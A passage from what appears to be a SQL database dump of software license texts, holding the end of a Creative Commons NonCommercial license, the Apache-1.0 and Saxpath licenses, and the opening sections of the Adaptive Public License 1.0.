absence\nof proper authority, may not be circumvented under laws fulfilling obligations\nunder Article 11 of the WIPO Copyright Treaty adopted on December 20, 1996,\nand/or similar international agreements.\n\ne. Exceptions and Limitations means fair use, fair dealing, and/or any other\nexception or limitation to Copyright and Similar Rights that applies to Your\nuse of the Licensed Material.\n\nf. Licensed Material means the artistic or literary work, database, or other\nmaterial to which the Licensor applied this Public License.\n\ng. Licensed Rights means the rights granted to You subject to the terms and\nconditions of this Public License, which are limited to all Copyright and\nSimilar Rights that apply to Your use of the Licensed Material and that the\nLicensor has authority to license.\n\nh. Licensor means the individual(s) or entity(ies) granting rights under this\nPublic License.\n\ni. NonCommercial means not primarily intended for or directed towards commercial\nadvantage or monetary compensation. For purposes of this Public License, the\nexchange of the Licensed Material for other material subject to Copyright\nand Similar Rights by digital file-sharing or similar means is NonCommercial\nprovided there is no payment of monetary compensation in connection with the\nexchange.\n\nj. Share means to provide material to the public by any means or process that\nrequires permission under the Licensed Rights, such as reproduction, public\ndisplay, public performance, distribution, dissemination, communication, or\nimportation, and to make material available to the public including in ways\nthat members of the public may access the material from a place and at a time\nindividually chosen by them.\n\nk. Sui Generis Database Rights means rights other than copyright resulting\nfrom Directive 96/9/EC of the European Parliament and of the Council of 11\nMarch 1996 on the legal protection of databases, as amended and/or succeeded,\nas well as other essentially equivalent rights anywhere in the world.\n\nl. You means the individual or entity exercising the Licensed Rights under\nthis Public License. Your has a corresponding meaning.\n\n \n\n Section 2 – Scope.\n\n a. License grant.\n\n1. Subject to the terms and conditions of this Public License, the Licensor\nhereby grants You a worldwide, royalty-free, non-sublicensable, non-exclusive,\nirrevocable license to exercise the Licensed Rights in the Licensed Material\nto:\n\nA. reproduce and Share the Licensed Material, in whole or in part, for NonCommercial\npurposes only; and\n\nB. produce, reproduce, and Share Adapted Material for NonCommercial purposes\nonly.\n\n2. Exceptions and Limitations. For the avoidance of doubt, where Exceptions\nand Limitations apply to Your use, this Public License does not apply, and\nYou do not need to comply with its terms and conditions.\n\n 3. Term. The term of this Public License is specified in Section 6(a).\n\n4. Media and formats; technical modifications allowed. The Licensor authorizes\nYou to exercise the Licensed Rights in all media and formats whether now known\nor hereafter created, and to make technical modifications necessary to do\nso. The Licensor waives and/or agrees not to assert any right or authority\nto forbid You from making technical modifications necessary to exercise the\nLicensed Rights, including technical modifications necessary to circumvent\nEffective Technological Measures. For purposes of this Public License, simply\nmaking modifications authorized by this Section 2(a)(4) never produces Adapted\nMaterial.\n\n 5. Downstream recipients.\n\nA. Offer from the Licensor – Licensed Material. Every recipient of the Licensed\nMaterial automatically receives an offer from the Licensor to exercise the\nLicensed Rights under the terms and conditions of this Public License.\n\nB. No downstream restrictions. You may not offer or impose any additional\nor different terms or conditions on, or apply any Effective Technological\nMeasures to, the Licensed Material if doing so restricts exercise of the Licensed\nRights by any recipient of the Licensed Material.\n\n6. No endorsement. Nothing in this Public License constitutes or may be construed\nas permission to assert or imply that You are, or that Your use of the Licensed\nMaterial is, connected with, or sponsored, endorsed, or granted official status\nby, the Licensor or others designated to receive attribution as provided in\nSection 3(a)(1)(A)(i).\n\n b. Other rights.\n\n1. Moral rights, such as the right of integrity, are not licensed under this\nPublic License, nor are publicity, privacy, and/or other similar personality\nrights; however, to the extent possible, the Licensor waives and/or agrees\nnot to assert any such rights held by the Licensor to the limited extent necessary\nto allow You to exercise the Licensed Rights, but not otherwise.\n\n2. Patent and trademark rights are not licensed under this Public License.\n\n3. To the extent possible, the Licensor waives any right to collect royalties\nfrom You for the exercise of the Licensed Rights, whether directly or through\na collecting society under any voluntary or waivable statutory or compulsory\nlicensing scheme. In all other cases the Licensor expressly reserves any right\nto collect such royalties, including when the Licensed Material is used other\nthan for NonCommercial purposes.\n\n \n\n Section 3 – License Conditions.\n\nYour exercise of the Licensed Rights is expressly made subject to the following\nconditions.\n\n a. Attribution.\n\n1. If You Share the Licensed Material (including in modified form), You must:\n\nA. retain the following if it is supplied by the Licensor with the Licensed\nMaterial:\n\ni. identification of the creator(s) of the Licensed Material and any others\ndesignated to receive attribution, in any reasonable manner requested by the\nLicensor (including by pseudonym if designated);\n\n ii. a copyright notice;\n\n iii. a notice that refers to this Public License;\n\n iv. a notice that refers to the disclaimer of warranties;\n\nv. a URI or hyperlink to the Licensed Material to the extent reasonably practicable;\n\nB. indicate if You modified the Licensed Material and retain an indication\nof any previous modifications; and\n\nC. indicate the Licensed Material is licensed under this Public License, and\ninclude the text of, or the URI or hyperlink to, this Public License.\n\n2. You may satisfy the conditions in Section 3(a)(1) in any reasonable manner\nbased on the medium, means, and context in which You Share the Licensed Material.\nFor example, it may be reasonable to satisfy the conditions by providing a\nURI or hyperlink to a resource that includes the required information.\n\n3. If requested by the Licensor, You must remove any of the information required\nby Section 3(a)(1)(A) to the extent reasonably practicable.\n\n4. If You Share Adapted Material You produce, the Adapter\'s License You apply\nmust not prevent recipients of the Adapted Material from complying with this\nPublic License.\n\n \n\n Section 4 – Sui Generis Database Rights.\n\nWhere the Licensed Rights include Sui Generis Database Rights that apply to\nYour use of the Licensed Material:\n\na. for the avoidance of doubt, Section 2(a)(1) grants You the right to extract,\nreuse, reproduce, and Share all or a substantial portion of the contents of\nthe database for NonCommercial purposes only;\n\nb. if You include all or a substantial portion of the database contents in\na database in which You have Sui Generis Database Rights, then the database\nin which You have Sui Generis Database Rights (but not its individual contents)\nis Adapted Material; and\n\nc. You must comply with the conditions in Section 3(a) if You Share all or\na substantial portion of the contents of the database.\n\nFor the avoidance of doubt, this Section 4 supplements and does not replace\nYour obligations under this Public License where the Licensed Rights include\nother Copyright and Similar Rights.\n\n \n\n Section 5 – Disclaimer of Warranties and Limitation of Liability.\n\na. Unless otherwise separately undertaken by the Licensor, to the extent possible,\nthe Licensor offers the Licensed Material as-is and as-available, and makes\nno representations or warranties of any kind concerning the Licensed Material,\nwhether express, implied, statutory, or other. This includes, without limitation,\nwarranties of title, merchantability, fitness for a particular purpose, non-infringement,\nabsence of latent or other defects, accuracy, or the presence or absence of\nerrors, whether or not known or discoverable. Where disclaimers of warranties\nare not allowed in full or in part, this disclaimer may not apply to You.\n\nb. To the extent possible, in no event will the Licensor be liable to You\non any legal theory (including, without limitation, negligence) or otherwise\nfor any direct, special, indirect, incidental, consequential, punitive, exemplary,\nor other losses, costs, expenses, or damages arising out of this Public License\nor use of the Licensed Material, even if the Licensor has been advised of\nthe possibility of such losses, costs, expenses, or damages. Where a limitation\nof liability is not allowed in full or in part, this limitation may not apply\nto You.\n\nc. The disclaimer of warranties and limitation of liability provided above\nshall be interpreted in a manner that, to the extent possible, most closely\napproximates an absolute disclaimer and waiver of all liability.\n\n \n\n Section 6 – Term and Termination.\n\na. This Public License applies for the term of the Copyright and Similar Rights\nlicensed here. However, if You fail to comply with this Public License, then\nYour rights under this Public License terminate automatically.\n\nb. Where Your right to use the Licensed Material has terminated under Section\n6(a), it reinstates:\n\n1. automatically as of the date the violation is cured, provided it is cured\nwithin 30 days of Your discovery of the violation; or\n\n 2. upon express reinstatement by the Licensor.\n\nFor the avoidance of doubt, this Section 6(b) does not affect any right the\nLicensor may have to seek remedies for Your violations of this Public License.\n\nc. For the avoidance of doubt, the Licensor may also offer the Licensed Material\nunder separate terms or conditions or stop distributing the Licensed Material\nat any time; however, doing so will not terminate this Public License.\n\n d. Sections 1, 5, 6, 7, and 8 survive termination of this Public License.\n\n \n\n Section 7 – Other Terms and Conditions.\n\na. The Licensor shall not be bound by any additional or different terms or\nconditions communicated by You unless expressly agreed.\n\nb. Any arrangements, understandings, or agreements regarding the Licensed\nMaterial not stated herein are separate from and independent of the terms\nand conditions of this Public License.\n\n \n\n Section 8 – Interpretation.\n\na. For the avoidance of doubt, this Public License does not, and shall not\nbe interpreted to, reduce, limit, restrict, or impose conditions on any use\nof the Licensed Material that could lawfully be made without permission under\nthis Public License.\n\nb. To the extent possible, if any provision of this Public License is deemed\nunenforceable, it shall be automatically reformed to the minimum extent necessary\nto make it enforceable. If the provision cannot be reformed, it shall be severed\nfrom this Public License without affecting the enforceability of the remaining\nterms and conditions.\n\nc. No term or condition of this Public License will be waived and no failure\nto comply consented to unless expressly agreed to by the Licensor.\n\nd. Nothing in this Public License constitutes or may be interpreted as a limitation\nupon, or waiver of, any privileges and immunities that apply to the Licensor\nor You, including from the legal processes of any jurisdiction or authority.\n\nCreative Commons is not a party to its public licenses. Notwithstanding, Creative\nCommons may elect to apply one of its public licenses to material it publishes\nand in those instances will be considered the \"Licensor.\" The text of the\nCreative Commons public licenses is dedicated to the public domain under the\nCC0 Public Domain Dedication. Except for the limited purpose of indicating\nthat material is shared under a Creative Commons public license or as otherwise\npermitted by the Creative Commons policies published at creativecommons.org/policies,\nCreative Commons does not authorize the use of the trademark \"Creative Commons\"\nor any other trademark or logo of Creative Commons without its prior written\nconsent including, without limitation, in connection with any unauthorized\nmodifications to any of its public licenses or any other arrangements, understandings,\nor agreements concerning use of licensed material. For the avoidance of doubt,\nthis paragraph does not form part of the public licenses.\n\nCreative Commons may be contacted at creativecommons.org.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(4,'Apache-1.0','Copyright (c) 1995-1999 The Apache Group. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. All advertising materials mentioning features or use of this software must\ndisplay the following acknowledgment: \"This product includes software developed\nby the Apache Group for use in the Apache HTTP server project (http://www.apache.org/)\n.\"\n\n4. The name \"Apache Server\" and \"Apache Group\" must not be used to endorse\nor promote products derived from this software without prior written permission.\nFor written permission, please contact apache@apache.org .\n\n5. Products derived from this software may not be called \"Apache\" nor may\n\"Apache\" appear in their name, without prior written permission of the Apache\nGroup .\n\n6. Redistributions of any form whatsoever must retain the following acknowledgment:\n\n\"This product includes software developed by the Apache Group for use in the\nApache HTTP server project (http://www.apache.org/) .\"\n\nTHIS SOFTWARE IS PROVIDED BY THE APACHE GROUP ``AS IS\'\' AND ANY EXPRESSED\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN\nNO EVENT SHALL THE APACHE GROUP OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT,\nINDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\nBUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\nOF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nThis software consists of voluntary contributions made by many individuals\non behalf of the Apache Group and was originally based on public domain software\nwritten at the National Center for Supercomputing Applications, University\nof Illinois, Urbana-Champaign. For more information on the Apache Group and\nthe Apache HTTP server project, please see <http://www.apache.org/>.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(5,'Saxpath','Copyright (C) 2000-2002 werken digital.\n\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions, and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions, and the disclaimer that follows these conditions\nin the documentation and/or other materials provided with the distribution.\n\n3. The name \"SAXPath\" must not be used to endorse or promote products derived\nfrom this software without prior written permission. For written permission,\nplease contact license@saxpath.org.\n\n4. Products derived from this software may not be called \"SAXPath\", nor may\n\"SAXPath\" appear in their name, without prior written permission from the\nSAXPath Project Management (pm@saxpath.org).\n\nIn addition, we request (but do not require) that you include in the end-user\ndocumentation provided with the redistribution and/or in the software itself\nan acknowledgement equivalent to the following:\n\n\"This product includes software developed by the SAXPath Project (http://www.saxpath.org/).\"\n\nAlternatively, the acknowledgment may be graphical using the logos available\nat http://www.saxpath.org/\n\nTHIS SOFTWARE IS PROVIDED ``AS IS\'\' AND ANY EXPRESSED OR IMPLIED WARRANTIES,\nINCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND\nFITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE SAXPath\nAUTHORS OR THE PROJECT CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\nPROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\nOR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(6,'APL-1.0','ADAPTIVE PUBLIC LICENSE\n\nVersion 1.0\n\nTHE LICENSED WORK IS PROVIDED UNDER THE TERMS OF THIS ADAPTIVE PUBLIC LICENSE\n(\"LICENSE\"). ANY USE, REPRODUCTION OR DISTRIBUTION OF THE LICENSED WORK CONSTITUTES\nRECIPIENT\'S ACCEPTANCE OF THIS LICENSE AND ITS TERMS, WHETHER OR NOT SUCH\nRECIPIENT READS THE TERMS OF THIS LICENSE. \"LICENSED WORK\" AND \"RECIPIENT\"\nARE DEFINED BELOW.\n\nIMPORTANT NOTE: This License is \"adaptive\", and the generic version or another\nversion of an Adaptive Public License should not be relied upon to determine\nyour rights and obligations under this License. You must read the specific\nAdaptive Public License that you receive with the Licensed Work, as certain\nterms are defined at the outset by the Initial Contributor.\n\nSee Section 2.2 below, Exhibit A attached, and any Suppfile.txt accompanying\nthis License to determine the specific adaptive features applicable to this\nLicense. For example, without limiting the foregoing, (a) for selected choice\nof law and jurisdiction see Part 3 of Exhibit A; (b) for the selected definition\nof Third Party see Part 4 of Exhibit A; and (c) for selected patent licensing\nterms (if any) see Section 2.2 below and Part 6 of Exhibit A.\n\n 1. DEFINITIONS.\n\n 1.1. \"CONTRIBUTION\" means:\n\n(a) In the case of the Initial Contributor, the Initial Work distributed under\nthis License by the Initial Contributor; and\n\n(b) In the case of each Subsequent Contributor, the Subsequent Work originating\nfrom and distributed by such Subsequent Contributor.\n\n1.2. \"DESIGNATED WEB SITE\" means the web site having the URL identified in\nPart 1 of Exhibit A, which URL may be changed by the Initial Contributor by\nposting on the current Designated Web Site the new URL for at least sixty\n(60) days.\n\n1.3. \"DISTRIBUTOR\" means any Person that distributes the Licensed Work or\nany portion thereof to at least one Third Party.\n\n1.4. \"ELECTRONIC DISTRIBUTION MECHANISM\" means any mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n1.5. \"EXECUTABLE\" means the Licensed Work in any form other than Source Code.\n\n1.6. \"GOVERNING JURISDICTION\" means the state, province or other legal jurisdiction\nidentified in Part 3 of Exhibit A.\n\n1.7. \"INDEPENDENT MODULE\" means a separate module of software and/or data\nthat is not a derivative work of or copied from the Licensed Work or any portion\nthereof. In addition, a module does not qualify as an Independent Module but\ninstead forms part of the Licensed Work if the module: (a) is embedded in\nthe Licensed Work; (b) is included by reference in the Licensed Work other\nthan by a function call or a class reference; or (c) must be included or contained,\nin whole or in part, within a file directory or subdirectory actually containing\nfiles making up the Licensed Work.\n\n1.8. \"INITIAL CONTRIBUTOR\" means the Person or entity identified as the Initial\nContributor in the notice required by Part 1 of Exhibit A.\n\n1.9. \"INITIAL WORK\" means the initial Source Code, object code (if any) and\ndocumentation for the computer program identified in Part 2 of Exhibit A,\nas such Source Code, object code and documentation is distributed under this\nLicense by the Initial Contributor.\n\n1.10. \"LARGER WORK\" means a work that combines the Licensed Work or portions\nthereof with code not governed by this License.\n\n1.11. \"LICENSED WORK\" means the Initial Work and/or any Subsequent Work, in\neach case including portions thereof.\n\n 1.12. \"LICENSE NOTICE\" has the meaning assigned in Part 5 of Exhibit A.\n\n1.13. \"MODIFICATION\" or \"MODIFICATIONS\" means any change to and/or addition\nto the Licensed Work.\n\n1.14. \"PERSON\" means an individual or other legal entity, including a corporation,\npartnership or other body.\n\n1.15. \"RECIPIENT\" means any Person who receives or obtains the Licensed Work\nunder this License (by way of example, without limiting the foregoing, any\nSubsequent Contributor or Distributor).\n\n1.16. \"SOURCE CODE\" means the source code for a computer program, including\nthe source code for all modules and components of the computer program, plus\nany associated interface definition files, and scripts used to control compilation\nand installation of an executable.\n\n1.17. \"SUBSEQUENT CONTRIBUTOR\" means any Person that makes or contributes\nto the making of any Subsequent Work and that distributes that Subsequent\nWork to at least one Third Party.\n\n1.18. \"SUBSEQUENT WORK\" means a work that has resulted or arises from changes\nto and/or additions to:\n\n (a) the Initial Work;\n\n (b) any other Subsequent Work; or\n\n(c) to any combination of the Initial Work and any such other Subsequent Work;\n\nwhere such changes and/or additions originate from a Subsequent Contributor.\nA Subsequent Work will \"originate\" from a Subsequent Contributor if the Subsequent\nWork was a result of efforts by such Subsequent Contributor (or anyone acting\non such Subsequent Contributor\'s behalf, such as, a contractor or other entity\nthat is engaged by or under the direction of the Subsequent Contributor).\nFor greater certainty, a Subsequent Work expressly excludes and shall not\ncapture within its meaning any Independent Module.\n\n1.19. \"SUPPLEMENT FILE\" means a file distributed with the Licensed Work having\na file name \"suppfile.txt\".\n\n 1.20. \"THIRD PARTY\" has the meaning assigned in Part 4 of Exhibit A.\n\n 2. LICENSE.\n\n 2.1. COPYRIGHT LICENSE FROM INITIAL AND SUBSEQUENT CONTRIBUTORS.\n\n(a) Subject to the terms of this License, the Initial Contributor hereby grants\neach Recipient a world-wide, royalty-free, non-exclusive copyright license\nto:\n\n(i) reproduce, prepare derivative works of, publicly display, publicly perform,\ndistribute and sublicense the Initial Work; and\n\n(ii) reproduce, publicly display, publicly perform, distribute, and sublicense\nany derivative works (if any) prepared by Recipient;\n\nin Source Code and Executable form, either with other Modifications, on an\nunmodified basis, or as part of a Larger Work.\n\n(b) Subject to the terms of this License, each Subsequent Contributor hereby\ngrants each Recipient a world-wide, royalty-free, non-exclusive copyright\nlicense to:\n\n(i) reproduce, prepare derivative works of, publicly display, publicly perform,\ndistribute and sublicense the Subsequent Work of such Subsequent Contributor;\nand\n\n(ii) reproduce, publicly display, publicly perform, distribute, and sublicense\nany derivative works (if any) prepared by Recipient;\n\nin Source Code and Executable form, either with other Modifications, on an\nunmodified basis, or as part of a Larger Work.\n\n 2.2. PATENT LICENSE FROM INITIAL AND SUBSEQUENT CONTRIBUTORS.\n\n(a) This License does not include or grant any patent license whatsoever from\nthe Initial Contributor, Subsequent Contributor, or any Distributor unless,\nat the time the Initial Work is first distributed or made available under\nthis License (as the case may be), the Initial Contributor has selected pursuant\nto Part 6 of Exhibit A the patent terms in paragraphs A, B, C, D and E from\nPart 6 of Exhibit A. If this is not done then the Initial Work and any other\nSubsequent Work is made available under the License without any patent license\n(the \"PATENTS-EXCLUDED LICENSE\").\n\n(b) However, the Initial Contributor may subsequently distribute or make available\n(as the case may be) future copies of: (1) the Initial Work; or (2) any Licensed\nWork distributed by the Initial Contributor which includes the Initial Work\n(or any portion thereof) and/or any Modification made by the Initial Contributor;\navailable under a License which includes a patent license (the \"PATENTS-INCLUDED\nLICENSE\") by selecting pursuant to Part 6 of Exhibit A the patent terms in\nparagraphs A, B, C, D and E from Part 6 of Exhibit A, when the Initial Contributor\ndistributes or makes available (as the case may be) such future copies under\nthis License.\n\n(c) If any Recipient receives or obtains one or more copies of the Initial\nWork or any other portion of the Licensed Work under the Patents-Included\nLicense, then all licensing of such copies under this License shall include\nthe terms in paragraphs A, B, C, D and E from Part 6 of Exhibit A and that\nRecipient shall not be able to rely upon the Patents-Excluded License for\nany such copies. However, all Recipients that receive one or more copies of\nthe Initial Work or any other portion of the Licensed Work under a copy of\nthe License which includes the Patents-Excluded License shall have no patent\nlicense with respect to such copies received under the Patents-Excluded License\nand availability and distribution of such copies, including Modifications\nmade by such Recipient to such copies, shall be under a copy of the License\nwithout any patent license.\n\n(d) Where a Recipient uses in combination or combines any copy of the Licensed\nWork (or portion thereof) licensed under a copy of the License having a Patents-Excluded\nLicense with any copy of the Licensed Work (or portion thereof) licensed under\na copy of the License having a Patents-Included License, the combination (and\nany portion thereof) shall, from the first time such Recipient uses, makes\navailable or distributes the combination (as the case may be), be subject\nto only the terms of the License having the Patents-Included License which\nshall include the terms in paragraphs A, B, C, D and E from Part 6 of Exhibit\nA.\n\n 2.3. ACKNOWLEDGEMENT AND DISCLAIMER.\n\nRecipient understands and agrees that although Initial Contributor and each\nSubsequent Contributor grants the licenses to its Contributions set forth\nherein, no representation, warranty, guarantee or assurance is provided by\nany Initial Contributor, Subsequent Contributor, or Distributor that the Licensed\nWork does not infringe the patent or other intellectual property rights of\nany other entity. Initial Contributor, Subsequent Contributor, and each Distributor\ndisclaims any liability to Recipient for claims brought by any other entity\nbased on infringement of intellectual property rights or otherwise, in relation\nto the Licensed Works. As a condition to exercising the rights and licenses\ngranted hereunder, each Recipient hereby assumes sole responsibility to secure\nany other intellectual property rights needed, if any. For example, without\nlimiting the foregoing disclaimers, if a third party patent license is required\nto allow Recipient to distribute the Licensed Work, it is Recipient\'s responsibility\nto acquire that license before distributing the Licensed Work.\n\n 2.4. RESERVATION.\n\nNothing in this License shall be deemed to grant any rights to trademarks,\ncopyrights, patents, trade secrets or any other intellectual property of Initial\nContributor, Subsequent Contributor, or Distributor except as expressly stated\nherein.\n\n 3. DISTRIBUTION OBLIGATIONS.\n\n 3.1. DISTRIBUTION GENERALLY.\n\n(a) A Subsequent Contributor shall make that Subsequent Contributor\'s Subsequent\nWork(s) available to the public via an Electronic Distribution Mechanism for\na period of at least twelve (12) months. The aforesaid twelve (12) month period\nshall begin within a reasonable time after the creation of the Subsequent\nWork and no later than sixty (60) days after first distribution of that Subsequent\nContributor\'s Subsequent Work.\n\n(b) All Distributors must distribute the Licensed Work in accordance with\nthe terms of the License, and must include a copy of this License (including\nwithout limitation Exhibit A and the accompanying Supplement File) with each\ncopy of the Licensed Work distributed. In particular, this License must be\nprominently distributed with the Licensed Work in a file called \"license.txt.\"\nIn addition, the License Notice in Part 5 of Exhibit A must be included at\nthe beginning of all Source Code files, and viewable to a user in any executable\nsuch that the License Notice is reasonably brought to the attention of any\nparty using the Licensed Work.\n\n 3.2. EXECUTABLE DISTRIBUTIONS OF THE LICENSED WORK.\n\nA Distributor may choose to distribute the Licensed Work, or any portion thereof,\nin Executable form (an \"EXECUTABLE DISTRIBUTION\") to any third party, under\nthe terms of Section 2 of this License, provided the Executable Distribution\nis made available under and accompanied by a copy of this License, AND provided\nat least ONE of the following conditions is fulfilled:\n\n(a) The Executable Distribution must be accompanied by the Source Code for\nthe Licensed Work making up the Executable Distribution, and the Source Code\nmust be distributed on the same media as the Executable Distribution or using\nan Electronic Distribution Mechanism; or\n\n(b) The Executable Distribution must be accompanied with a written offer,\nvalid for at least thirty six (36) months, to give any third party under the\nterms of this License, for a charge no more than the cost of physically performing\nsource distribution, a complete machine-readable copy of the Source Code for\nthe Licensed Work making up the Executable Distribution, to be available and\ndistributed using an Electronic Distribution Mechanism, and such Executable\nDistribution must remain available in Source Code form to any third party\nvia the Electronic Distribution Mechanism (or any replacement Electronic Distribution\nMechanism the particular Distributor may reasonably need to turn to as a substitute)\nfor said at least thirty six (36) months.\n\nFor greater certainty, the above-noted requirements apply to any Licensed\nWork or portion thereof distributed to any third party in Executable form,\nwhether such distribution is made alone, in combination with a Larger Work\nor Independent Modules, or in some other combination.\n\n 3.3. SOURCE CODE DISTRIBUTIONS.\n\nWhen a Distributor makes the Licensed Work, or any portion thereof, available\nto any Person in Source Code form, it must be made available under this License\nand a copy of this License must be included with each copy of the Source Code,\nsituated so that the copy of the License is conspicuously brought to the attention\nof that Person. For greater clarification, this Section 3.3 applies to all\ndistribution of the Licensed Work in any Source Code form. A Distributor may\ncharge a fee for the physical act of transferring a copy, which charge shall\nbe no more than the cost of physically performing source distribution.\n\n 3.4. REQUIRED NOTICES IN SOURCE CODE.\n\nEach Subsequent Contributor must ensure that the notice set out in Part 5\nof Exhibit A is included in each file of the Source Code for each Subsequent\nWork originating from that particular Subsequent Contributor, if such notice\nis not already included in each such file. If it is not possible to put such\nnotice in a particular Source Code file due to its structure, then the Subsequent\nContributor must include such notice in a location (such as a relevant directory\nin which the file is stored) where a user would be likely to look for such\na notice.\n\n 3.5. NO DISTRIBUTION REQUIREMENTS FOR INTERNALLY USED MODIFICATIONS.\n\nNotwithstanding Sections 3.2, 3.3 and 3.4, Recipient may, internally within\nits own corporation or organization use the Licensed Work, including the Initial\nWork and Subsequent Works, and make Modifications for internal use within\nRecipient\'s own corporation or organization (collectively, \"INTERNAL USE MODIFICATIONS\").\nThe Recipient shall have no obligation to distribute, in either Source Code\nor Executable form, any such Internal Use Modifications made by Recipient\nin the course of such internal use, except where required below in this Section\n3.5. All Internal Use Modifications distributed to any Person, whether or\nnot a Third Party, shall be distributed pursuant to and be accompanied by\nthe terms of this License. If the Recipient chooses to distribute any such\nInternal Use Modifications to any Third Party, then the Recipient shall be\ndeemed a Subsequent Contributor, and any such Internal Use Modifications distributed\nto any Third Party shall be deemed a Subsequent Work originating from that\nSubsequent Contributor, and shall from the first such instance become part\nof the Licensed Work that must thereafter be distributed and made available\nto third parties in accordance with the terms of Sections 3.1 to 3.4 inclusive.\n\n 3.6. INDEPENDENT MODULES.\n\nThis License shall not apply to Independent Modules of any Initial Contributor,\nSubsequent Contributor, Distributor or any Recipient, and such Independent\nModules may be licensed or made available under one or more separate license\nagreements.\n\n 3.7. LARGER WORKS.\n\nAny Distributor or Recipient may create or contribute to a Larger Work by\ncombining any of the Licensed Work with other code not governed by the terms\nof this License, and may distribute the Larger Work as one or more products.\nHowever, in any such case, Distributor or Recipient (as the case may be) must\nmake sure that the requirements of this License are fulfilled for the Licensed\nWork portion of the Larger Work.\n\n 3.8. DESCRIPTION OF DISTRIBUTED MODIFICATIONS.\n\n(a) Each Subsequent Contributor (including the Initial Contributor where the\nInitial Contributor also qualifies as a Subsequent Contributor) must cause\neach Subsequent Work created or contributed to by that Subsequent Contributor\nto contain a file documenting the changes, in accordance with the requirements\nof Part 1 of the Supplement File, that such Subsequent Contributor made in\nthe creation or contribution to that Subsequent Work. If no Supplement File\nexists or no requirements are set out in Part 1 of the Supplement File, then\nthere are no requirements for Subsequent Contributors to document changes\nthat they make resulting in Subsequent Works.\n\n(b) The Initial Contributor may at any time introduce requirements or add\nto or change earlier requirements (in each case, the \"EARLIER DESCRIPTION\nREQUIREMENTS\") for documenting changes resulting in Subsequent Works by revising\nPart 1 of each copy of the Supplement File distributed by the Initial Contributor\nwith future copies of the Licensed Work so that Part 1 then contains new requirements\n(the \"NEW DESCRIPTION REQUIREMENTS\") for documenting such changes.\n\n(c) Any Recipient receiving at any time any copy of an Initial Work or any\nSubsequent Work under a copy of this License (in each case, an \"Earlier LICENSED\nCOPY\") having the Earlier Description Requirements may choose, with respect\nto each such Earlier Licensed Copy, to comply with the Earlier Description\nRequirements or the New Description Requirements. Where a Recipient chooses\nto comply with the New Description Requirements, that Recipient will, when\nthereafter distributing any copies of any such Earlier Licensed Copy, include\na Supplement File having a section entitled Part 1 that contains a copy of\nthe New Description Requirements.\n\n(d) For greater certainty, the intent of Part 1 of the Supplement File is\nto provide a mechanism (if any) by which Subsequent Contributors must document\nchanges that they make to the Licensed Work resulting in Subsequent Works.\nPart 1 of any Supplement File shall not be used to increase or reduce the\nscope of the license granted in Article 2 of this License or in any other\nway increase or decrease the rights and obligations of any Recipient, and\nshall at no time serve as the basis for terminating the License. Further,\na Recipient can be required to correct and change its documentation procedures\nto comply with Part 1 of the Supplement File, but cannot be penalised with\ndamages. Part 1 of any Supplement File is only binding on each Recipient of\nany Licensed Work to the extent Part 1 sets out the requirements for documenting\nchanges to the Initial Work or any Subsequent Work.\n\n(e) An example of a set of requirements for documenting changes and contributions\nmade by Subsequent Contributor is set out in Part 7 of Exhibit A of this License.\nPart 7 is a sample only and is not binding on Recipients, unless (subject\nto the earlier paragraphs of this Section 3.8) those are the requirements\nthat the Initial Contributor includes in Part 1 of the Supplement File with\nthe copies of the Initial Work distributed under this License.\n\n 3.9. USE OF DISTRIBUTOR NAME.\n\nThe name of a Distributor may not be used by any other Distributor to endorse\nor promote the Licensed Work or products derived from the Licensed Work, without\nprior written permission.\n\n 3.10. LIMITED RECOGNITION OF INITIAL CONTRIBUTOR.\n\n(a) As a modest attribution to the Initial Contributor, in the hope that its\npromotional value may help justify the time, money and effort invested in\nwriting the Initial Work, the Initial Contributor may include in Part 2 of\nthe Supplement File a requirement that each time an executable program resulting\nfrom the Initial Work or any Subsequent Work, or a program dependent thereon,\nis launched or run, a prominent display of the Initial Contributor\'s attribution\ninformation must occur (the \"ATTRIBUTION INFORMATION\"). The Attribution Information\nmust be included at the beginning of each Source Code file. For greater certainty,\nthe Initial Contributor may specify in the Supplement File that the above\nattribution requirement only applies to an executable program resulting from\nthe Initial Work or any Subsequent Work, but not a program dependent thereon.\nThe intent is to provide for reasonably modest attribution, therefore the\nInitial Contributor may 